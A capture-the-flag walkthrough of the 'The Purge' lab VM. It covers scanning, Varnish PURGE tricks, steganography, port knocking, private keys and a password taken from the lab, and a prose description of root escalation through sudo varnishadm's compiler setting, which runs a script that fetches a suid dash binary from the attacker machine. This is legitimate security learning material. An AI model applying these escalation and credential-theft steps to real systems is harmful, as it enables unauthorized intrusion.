Don’t Answer the Doorbell

The Purge was created by strata, and I can tell you it’s a hassle to complete. But I did, and here’s how !

What’s Running

I don’t want to tell you how to do this bit, so here’s the output

1
2
3
4
5
6
7
8
9
10
11
12

root@kali:~# nmap -sS -p- -T5 -Pn 172.16.231.134

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-06 22:17 GMT
Nmap scan report for thepurge (172.16.231.134)
Host is up (0.00027s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:AD:9E:6C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 52.91 seconds
root@kali:~#

Visiting the HTTP server without specifying a hosts entry will provide you with some instructions… however once a hosts entry is created, you can reference the VM correctly. So, I hit it with a browser to see what I was faced with.

thepurge_001

None of the links work on this page, so I’m stuck just looking at this. Using nc, I saw that the page is hosted via Varnish.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

root@kali:~# nc 172.16.231.134 80
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 06 Jan 2015 22:21:12 GMT
Server: Apache
Last-Modified: Fri, 02 Jan 2015 22:52:51 GMT
ETag: "82a-50bb3334896c0"
GovPurGe: Blessed be our New Founding Fathers and America
Content-Type: text/html; charset=UTF-8
X-Varnish: 3
Age: 0
Via: 1.1 varnish-v4
Connection: close
Accept-Ranges: bytes

Varnish is a caching server, and has a PURGE HTTP option which cleans out any caches. Also note the GovPurGe header.

My next step was to do some enumeration on the page. There are 3 reviews, one of which is in pseudo-latin. However, there are 4 words that immediately stood out to me due to strange captitalisation. Steg, Hide, Varnish, and Purge. I already know the server is Varnish, and I know about the PURGE option. However, steghide implies that something is hidden in an image…

So, an ominous message… I’ll note that down for later as it is not required right now.

There’s nothing else on this page of interest, so I decided to see what would happen if I send a PURGE request to the main page using curl

Once the PURGE completed, I visited the page again with a browser, and was presented with different page content.

thepurge_002

Interesting. I also discovered that the image at the bottom of the page, which I previously ran through steghide had a different filename. Maybe there’s something different inside it ?

Different data - that’s interesting. The Youtube video linked is Knocking on Heavens Door by Guns N Roses, however the random characters after the URL are HEX, which decode to 2005, 31337, 1995, and 22 in decimal. Sounds like port knocking to me which opens SSH access, but I don’t have any usernames, passwords, or private keys to use.

Remember the message we obtained from the first JPEG file ? The reviewers are fortunate to have homes in today's purged economic climate.. This implies that we might be able to browse the home folders of the various reviewers. Looking at the original, and purged versions of the front page, it is possible to obtain a list of possible users. Bill Williams0n, Zoey Sand1n, James Holmes, Charlie Hanger, and Bin Ladin. Of these users, only two home folders are accessible.

http://thepurge/~bwilliams0n

thepurge_003

What an interesting Youtube video

However, the HTML source is much more interesting

1
2
3
4
5
6
7
8
9
10
11
12

<html>
<head>
  <title>Bill Williamson</title>
</head>
<body bgcolor="black">
  <center>
    <embed width="840" height="620" src="http://www.youtube.com/v/vca7c04r95I">
  </center>
</body>
<!--
For the glory of sshaitan, of course!
-->

This didn’t tell me much, so I decided to PURGE it too using the curl command from earlier. This resulted in the following page being made available

thepurge_004

The Youtube video is even weirder, but the source changed too.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<html>
<head>
  <title>Bill Williamson</title>
</head>
<body bgcolor="black">
  <center>
    <embed width="840" height="620" src="http://www.youtube.com/v/uV-V1FqaEk8">
  </center>
</body>
<!--
-----BEGIN DSA PRIVATE KEY-----
MIIBvAIBAAKBgQDnNAyaHiNv1SynzOt+E83khP9PRQTmKlyvkx13b/3ARc/WjO9b
dAT//ZgAxttQiu1n8fqU+oop562TXvQyOm83YWkxVbf+YdQ4KUWdOMxFWJdbkCRW
IUa1XgoCVnIwz4I0fjKtvgNgf/TAmwz9sa2sqV6IYsROj6aTt7SdwXCtnQIVAP3b
n9k4O4SZ/8G83X6H/IMcjExRAoGAR2r8Zh/oZx5GOeDBacuy3LcDa3vfpHLfrqCK
X3V6I7VvQJcwjjorZQJqkO/7ECpHfrZIqVoN+TjYH2u2unRH56o55x5/rhUUCl1c
kFUikPwjwyLCjVT2DRD4WFnZcCa2wnCI9sxK70V+TbjMMS3AowxTBI+BhVXyYxLx
ylJw9kQCgYEA0Fggrt1A+DDQ1KS506LKPkT24ny3AMHg1psvjieT9uIO4LvFPq23
4wiZvMLNyapRlNADX/TGRmcC2bgf6P7l9D8zHEqoActThnPfMa05GFFvdF3z9ZEX
jRLP1n8BKjjElprmKYrqh8fLEk1gLA+B/GJRDO6+9oq5Ada4/3EEYuACFQDYW9iL
RQBGwzv7GW+JTy1Q1cmxew==
-----END DSA PRIVATE KEY-----
-->

That, to me, looks like a private key. So, back to port knocking.

Who’s There

Once the private key has been saved into a file and chmodded correctly (600), I use knocker to knock the ports, which allows SSH access.

So, now I have a shell. More enumeration required ! Wandering around the file system identifies that bwilliams0n has access to /home/zsand1n. Within that folder is an archive encrypted with PGP.

1
2
3
4
5
6
7
8
9
10

[bwilliams0n@thepurge zsand1n]$ ls -la
total 964
drwxr-xr-x. 3 zsand1n zsand1n   4096 Jan  1 23:43 .
drwxr-xr-x. 7 root    root        81 Jan  2 17:57 ..
-rw-r--r--. 1 zsand1n zsand1n     18 Sep 25 21:53 .bash_logout
-rw-r--r--. 1 zsand1n zsand1n    193 Sep 25 21:53 .bash_profile
-rw-r--r--. 1 zsand1n zsand1n    231 Sep 25 21:53 .bashrc
-rw-r--r--. 1 zsand1n zsand1n 964832 Jan  1 23:42 homes-backup-20150101.tar.gz.gpg
drwxrwxr-x. 6 zsand1n zsand1n   4096 Jan  6 14:45 public_html
[bwilliams0n@thepurge zsand1n]$

To decrypt this file we’ll need a copy of the private key used by the encrypting user.

There is a file in public_html that includes a public PGP key, but this is no help to us at all.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

[bwilliams0n@thepurge public_html]$ cat gpg_key.html
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)

mQENBFSmEy4BCADRTF4zqER6uVJ3II/tDHRIrWpeA8XGoegtTpjSOwjs8HYjPWzV
KWQsBj6GpI5zOHGjC7Tbufxn1C0TNotrEpOxCus2s/oaMJ8e1RmmpyP21cMe5Sxn
+Nu1O+oRA5QP2IYqnZvShqk2vw3UduMxheKik6EVA7EjZBeIdYhQK2fytbydrTIs
y+9GA1/UNBWQh1lQhRSbmQyiiTbQrybyhVZWrPT9E55mGJq4fLFybGRy+zjIsDfT
1gcS+BB6zdwp8YkxLR2DgaaSiTEl1YdUehoEoJMgtEdOqfng16O4ZL3rkIYKdjBi
KkB2sxYTH8PhF63D2h6/8w03ra5HZOivsNGVABEBAAG0HlpvZXkgU2FuZGluIDx6
c2FuZDFuQHRoZXB1cmdlPokBOQQTAQIAIwUCVKYTLgIbAwcLCQgHAwIBBhUIAgkK
CwQWAgMBAh4BAheAAAoJEEaUeoP/ScSJkZgIAK9xUZWnr1SnshBYawc6xWNPDdLM
8RjEPjgFdEXQe3D0xB16i0WC1153e4o6+L6rSGkkIf2siiY2BAS+yyR5YilA2aXv
CdYbYkcqRpXmGMeIiV9yKU3xZkgJUky28q0YNGEYZUGHYaRpS8PbQhX0a2OeVABV
vRXhrXju5SHDY4GyrKLheQ1u+pWQjNjeQr4K9jA7oPsB1X1EKzo6w89gZ7RZQCfz
bZoS+seodRIM32kGQYBvT0gE1aaKZ5OaASn7ezHOILDvCdYJtiGEcTuZ3TO37j4E
3wONeo6CFT/AJQ6xGGN6dMeCNfvEFJMzjW3ejrfiQyN0z/3BdaIEyAVhMFa5AQ0E
VKYTLgEIALFyNyOhUAkcFgXMoldw81Lg9ex34MeOix1LpOqInQU92VkmS1uYqKZJ
T4uW5mye2RLg4P3MHm60kmKIRXZYEx96aRgqxLaogQXv0pQ/t5RMNuvLn7wM934U
xkct7Ic6B3djnfoYt6UZftOmLmCl2mW8my/07N92Tx6VWbHu/MFgCFnj6EfbX6Vq
FER6A/0mtlHGbI0ysl+djB0vVw8g6zYUhxn7lTjEHLa237wuGMkWG7COcWzBBadU
DkTnN5692cpny5oEpMFi7E8xO4TNUw6V6mrMjYZGvBHlsF2akozhizU7dqhI+jlp
WTXVV2JYyHEM0WGz34ipn1a/kMKUBWMAEQEAAYkBHwQYAQIACQUCVKYTLgIbDAAK
CRBGlHqD/0nEiWh6B/4xo4G8vNoTgc4jJRHJ0ZezTS/sXRkfZO2eNDXVgcY7pF5Q
EaA/9VMEpDRz53eAt99mpj+eTQM/kVRKExqcAVDwy0YYXnvsjHFwD5dunIq88OSw
WLPNMBRgRvggez47zxjKtV6DiL1BYQ0YO3oyDtbA1CKhBHh8KmH0aV+/YE1axnAL
Qngh/4fF0E4OZ5vuCBsRrHHrH3r4k0jGRHTHvG3e9gfGcPKgr0P6To5wA4B5XEc1
UgN4YJWe1XeOy7yKCTanvUIrVWolHkao5xdQH8OOBqPQySACcW32T5sQxCqTkeR7
sH2SRodaWIgc9aVKLI1SAW2oYWJJNsqs1fuJtF1w
=tVjP
-----END PGP PUBLIC KEY BLOCK-----

Could I use my old friend PURGE and see if the file changes ? Why yes, yes I can… and yes, it does change - I now have a private key instead of a public one.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)

lQO+BFSmEy4BCADRTF4zqER6uVJ3II/tDHRIrWpeA8XGoegtTpjSOwjs8HYjPWzV
KWQsBj6GpI5zOHGjC7Tbufxn1C0TNotrEpOxCus2s/oaMJ8e1RmmpyP21cMe5Sxn
+Nu1O+oRA5QP2IYqnZvShqk2vw3UduMxheKik6EVA7EjZBeIdYhQK2fytbydrTIs
y+9GA1/UNBWQh1lQhRSbmQyiiTbQrybyhVZWrPT9E55mGJq4fLFybGRy+zjIsDfT
1gcS+BB6zdwp8YkxLR2DgaaSiTEl1YdUehoEoJMgtEdOqfng16O4ZL3rkIYKdjBi
KkB2sxYTH8PhF63D2h6/8w03ra5HZOivsNGVABEBAAH+AwMCPT4eUY3Vk4/b6au7
6StGV15s0jIxygsFkJPkwEjoE2x5UnN/W6aS9HXm3Y5t67/s0zYpK5SQ+ZcGquRI
izcCf8dKQIq8bWsLr0GPaLHrS3Xj4iyTpRb8qInxxIZIsA+0RD54liwzKVRrqn16
y955XJWuFO+5rT2zyI8hBdO8hQlFpsNGRmeWZLbAENDUuMaQLeKfaoU/y9QEhs2T
RJuM5B5OzT1RCqnP+clXPh9/Y536afIiqAvQwBn6qQIaZLeCvpscyOhOWPUejVBd
ZxNBZ4gVkr4WseYsk3vBkxCc0E52rGEUf3IFpti5y5pWo6BvN1qZtGkFLm+t8Uv/
WXMRLPYTuYDPh8+KtNDXhA5EaW8kMUI9y1jhA3DoxhrDqiD1oGv0OInmJXAA4uwZ
GxzRCaY2fVwJ5giQj8X+8QxhMS61ZDbSl8AJNi6Ns8sY3uy96Al0rw3u72WF5CWb
nkslDQ4IdZBRYAGOMPLVrQqFO86RaWYMWjiNdm4ZybdgvJzci2jCzKCdevzUQRAZ
vKOKBGkLO7klCtgMrWTwusocp3+83OPzoO3jC1gY6r2UQms3otz2evsvZEluBXZQ
EKo13tAUy6LPHn/8Pfg29BglkSAdACt6MtSs7PWkoH2x948sU1HBEiMid8rNxTZW
d2bOcD+kRcEPPlKUC3ik0IcThAT+DcnWSSaAvugS+9QQhE6Td1SSMiJrUZb9/qBi
7VY/0GCGpMZJe3B8buclm/e8KaTFpnxktIFpXjHW6Lstpl7aPwsUHJ8e12AW6oBV
9CconzbhQeDnkOkK0RHIAX6g+gcPo6dN+Gc2wmamGcQ5Ps3tEtj9ptSERmZGhL+S
XYWrPVGFs2xpv/CxPoJMCkzdViY/ScfmhZuizkIdC4SlD6zAbQARD+1Hf+h5K8om
Q7QeWm9leSBTYW5kaW4gPHpzYW5kMW5AdGhlcHVyZ2U+iQE5BBMBAgAjBQJUphMu
AhsDBwsJCAcDAgEGFQgCCQoLBBYCAwECHgECF4AACgkQRpR6g/9JxImRmAgAr3FR
laevVKeyEFhrBzrFY08N0szxGMQ+OAV0RdB7cPTEHXqLRYLXXnd7ijr4vqtIaSQh
/ayKJjYEBL7LJHliKUDZpe8J1htiRypGleYYx4iJX3IpTfFmSAlSTLbyrRg0YRhl
QYdhpGlLw9tCFfRrY55UAFW9FeGteO7lIcNjgbKsouF5DW76lZCM2N5Cvgr2MDug
+wHVfUQrOjrDz2BntFlAJ/NtmhL6x6h1EgzfaQZBgG9PSATVpopnk5oBKft7Mc4g
sO8J1gm2IYRxO5ndM7fuPgTfA416joIVP8AlDrEYY3p0x4I1+8QUkzONbd6Ot+JD
I3TP/cF1ogTIBWEwVp0DvgRUphMuAQgAsXI3I6FQCRwWBcyiV3DzUuD17Hfgx46L
HUuk6oidBT3ZWSZLW5iopklPi5bmbJ7ZEuDg/cwebrSSYohFdlgTH3ppGCrEtqiB
Be/SlD+3lEw268ufvAz3fhTGRy3shzoHd2Od+hi3pRl+06YuYKXaZbybL/Ts33ZP
HpVZse78wWAIWePoR9tfpWoURHoD/Sa2UcZsjTKyX52MHS9XDyDrNhSHGfuVOMQc
trbfvC4YyRYbsI5xbMEFp1QOROc3nr3ZymfLmgSkwWLsTzE7hM1TDpXqasyNhka8
EeWwXZqSjOGLNTt2qEj6OWlZNdVXYljIcQzRYbPfiKmfVr+QwpQFYwARAQAB/gMD
Aj0+HlGN1ZOP29ALh3I5yyKsdLOC3OTVGg4vlt4CFDyrU7vEMctGnNn9lAf/yLWd
s1vWLdzeRJINV8ewRGFPmZvlzAVbipFPw/O6YvayDZA5hKrdGSZHN7/RRf77bLg9
yTWLOQV+tkba0ojjZrn3BjOuelBnR7yuCtDrkb5E9F+wDSxpQKc0TBOrb/5hgwCT
7yoKhwF+aiZRi1qBEh8YRTwKdp2DDPdonR4Z0P8ASne5kjucoUvwXQpDZSp2xfM2
EbyTCxR2zKXr1XRoaJsS6qk8BJkpZuN016SgZh+JvpVaqtW2vzlCkTaSlCZ/Bsgb
HWnkQsiJrgNPRcKw7MRCpSb2bhJxXPyIV032EEVe8LHyC7unZe0lzgANZXoSand1
k09t0/Bg53UOZGGgCQbV/6ADshXzqx5QUKbkMpfvAXbBVqn7dYD3Q0ERNF2bXZok
6rO9p0LGs6ujYNJRveZQZMr39PO5timhj7X4xD6Uw/AjkzaJGulHO1xQ0vRU9j5Q
vZzy+z/iQa0tyGMljC5r0ps5yKWnN3Eott/TkpL/QontkQBv5ZoVhdijBwP1puSx
LpHEHHOjJoan5bI0I/IfDa6Iu8eMYTj2xUJ7jE1RVEimalnEJml3zgTGuLU+Qz6o
vt1LyZXfJDrzaVP2iFecmpwX8HVtF6BqULBqJiJuqiLPnu4G0VOTIaCYMGi4KqFX
61uSDyKlguI0gcJHIgscglvbEzgz8lE7EhSboOQ14jjo2RWhoG0B23uHwNvWD0Qk
nJBRA3J/uKZHlhknHOCTRQcKBkzXZVjt7m1vJdXrl6N2RIwD7uWuC4IMQYVKRlZC
u4YxCZz+gCygIKHejMSUxRWE8paueC5h2kPIz2Bm0qLTHMNf2OfVZVD1DVXgDtoL
wWmIawCcsFrP2yrHVwqJAR8EGAECAAkFAlSmEy4CGwwACgkQRpR6g/9JxIloegf+
MaOBvLzaE4HOIyURydGXs00v7F0ZH2TtnjQ11YHGO6ReUBGgP/VTBKQ0c+d3gLff
ZqY/nk0DP5FUShManAFQ8MtGGF577IxxcA+XbpyKvPDksFizzTAUYEb4IHs+O88Y
yrVeg4i9QWENGDt6Mg7WwNQioQR4fCph9Glfv2BNWsZwC0J4If+HxdBODmeb7ggb
Eaxx6x96+JNIxkR0x7xt3vYHxnDyoK9D+k6OcAOAeVxHNVIDeGCVntV3jsu8igk2
p71CK1VqJR5GqOcXUB/Djgaj0MkgAnFt9k+bEMQqk5Hke7B9kkaHWliIHPWlSiyN
UgFtqGFiSTbKrNX7ibRdcA==
=ZWQm
-----END PGP PRIVATE KEY BLOCK-----

This can now be imported into GPG and used to decrypt the archive found earlier. Remember the GovPurGe header from earlier ? It contains the passphrase required to use the key.

I spent a lot of time looking through the files from this archive, and eventually found a password of “vi.isforleeth@xxors” hidden in .bash_history in the jholmes directory.
This allowed me to su as the jholmes user and discover that he is able to run the /usr/bin/varnishadm application via sudo. I also discovered that, with a few tweaks, you can get varnishadm to compile inline C and run commands as the user varnishd is running as. The last video shows me switching to the jholmes user, creating a malicious shell script to grab a copy of the dash binary from my attacking VM (dash does not drop privileges like bash does, therefore is a much better option for suid shells), running sudo varnishadm, and configuring varnish to run as root instead of the varnish user. I then configure the cc_compiler parameter to run the malicious script I created earlier, which allows me to drop to a root shell and read the /FLAG.txt file.

Done.

vm’s